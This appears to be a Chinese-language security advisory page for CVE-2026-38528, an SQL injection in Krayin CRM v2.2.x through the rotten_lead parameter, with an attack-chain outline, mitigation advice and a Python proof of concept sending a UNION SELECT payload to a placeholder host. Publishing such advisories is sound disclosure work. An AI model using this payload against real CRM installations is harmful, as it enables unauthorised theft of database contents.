CVE-2026-38528 CVSS 7.1 高危

CVE-2026-38528 Krayin CRM SQL注入漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-38528

漏洞类型

SQL注入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Krayin CRM

漏洞概述

Krayin CRM v2.2.x版本存在SQL注入漏洞。该漏洞源于/Lead/LeadDataGrid.php接口中的rotten_lead参数缺乏有效的输入过滤。具备低权限的攻击者可利用此漏洞执行恶意SQL查询，无需用户交互即可窃取数据库中的敏感信息，造成严重的数据泄露风险。

技术细节

该漏洞属于典型的SQL注入漏洞。在Krayin CRM v2.2.x版本中，/Lead/LeadDataGrid.php文件在处理数据请求时，直接将用户提交的rotten_lead参数拼接到SQL查询语句中，未进行任何严格的输入验证、转义或使用预编译语句。攻击者可以通过发送包含恶意SQL语法的HTTP请求载荷，欺骗后端数据库执行非授权的SQL命令。根据CVSS向量分析，攻击者仅需低权限账户即可利用此漏洞，且利用过程无需用户交互。成功利用该漏洞后，攻击者能够窃取数据库中的敏感信息，导致高机密性影响，严重威胁企业数据安全，甚至可能以此为跳板进行进一步渗透。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行Krayin CRM v2.2.x版本，并确定/Lead/LeadDataGrid.php接口的存在。

STEP 2

利用

攻击者获取低权限账户，构造包含恶意SQL语句的payload，通过rotten_lead参数发送至/Lead/LeadDataGrid.php端点。

STEP 3

数据窃取

后端数据库执行恶意SQL语句，将查询结果（如用户凭据、敏感业务数据）返回给攻击者，导致机密性泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://target.com/Lead/LeadDataGrid.php"

# Malicious payload to test SQL injection
# Example: Attempt to extract database version
payload = "1' UNION SELECT 1, version(), 3, 4, 5-- -"

# Parameters to be sent
params = {
    "rotten_lead": payload
}

try:
    # Send GET request to the vulnerable endpoint
    response = requests.get(target_url, params=params, timeout=10)

    # Check if request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
        
        # Analyze response to confirm vulnerability (pseudocode logic)
        if "mysql" in response.text.lower() or "syntax error" in response.text.lower():
            print("[!] Potential SQL Injection vulnerability confirmed.")
        else:
            print("[-] Vulnerability not confirmed via simple response check.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

影响范围

Krayin CRM v2.2.x

防御指南

临时缓解措施

建议立即检查并升级Krayin CRM至官方修复版本。若暂时无法升级，应在Web应用防火墙（WAF）中添加针对该接口的SQL注入拦截规则，并对数据库访问日志进行审计，以发现潜在的攻击行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表